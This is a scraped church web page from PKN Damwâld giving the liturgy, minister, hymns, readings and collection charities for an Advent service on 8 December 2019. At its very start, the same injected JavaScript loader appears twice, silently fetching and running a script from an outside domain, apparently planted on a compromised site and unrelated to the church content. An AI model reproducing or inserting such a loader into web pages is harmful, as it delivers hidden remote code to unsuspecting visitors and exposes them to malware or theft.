;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 8 december 2019 9:30 uur - PKN Damwâld
zondag 8 december 2019
09:30 uur
2e Advent

Kerkdienst zondag 8 december 2019 9:30 uur

Informatie

Voorganger:Ds. G.J. Otter
Organist:Nienke van der Heide-Visser
Mededeling:2e Advent
Liturgie
Lied voor de dienst Gezang 125 : 1 en 2
Welkom
We zingen: Elb 184 : 1 en 4
Stil Gebed, Votum en Groet
Tweede kaars aansteken
Adventsproject King Kids
We zingen: Projectlied
Wetslezing .
We zingen: Psalm 111 : 4 en 6
Gebed
We lezen: Lucas 1 : 5 - 25
We zingen: Gezang 67 : 1 en 3
Preek .
We zingen: Psalm 149 : 1 en 3
Dankzegging en voorbede
Collecte
Slotlied Gezang 127 : 1 en 3
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Onderwijs voor werkende kinderen in Colombia

Kinderen in de Knel - Onderwijs voor werkende kinderen in Colombia
Maar liefst 1,5 miljoen kinderen in Colombia moeten iedere dag zwaar en gevaarlijk werk doen. Ze groeien op in een omgeving met veel geweld en drugsgebruik, zoals in de sloppenwijken van de hoofdstad Bogotá. Kinderen werken er op de markt of in de vuilnis. School komt vaak op de laatste plaats. Stichting Kleine Arbeider, partner van Kerk in Actie, geeft de kinderen onderwijs en maakt ze meer weerbaar, om hun kansen op een betere toekomst te vergroten. 120 jongeren volgen vakonderwijs en leren producten te maken die ze zelf kunnen verkopen. De Kleine Arbeider heeft daarnaast een eigen internetcafé, een cafetaria en een koksopleiding waar kansarme jongeren een beroepsopleiding kunnen volgen.

Tweede collecte: Kerk
Uitganscollecte: Bouwfonds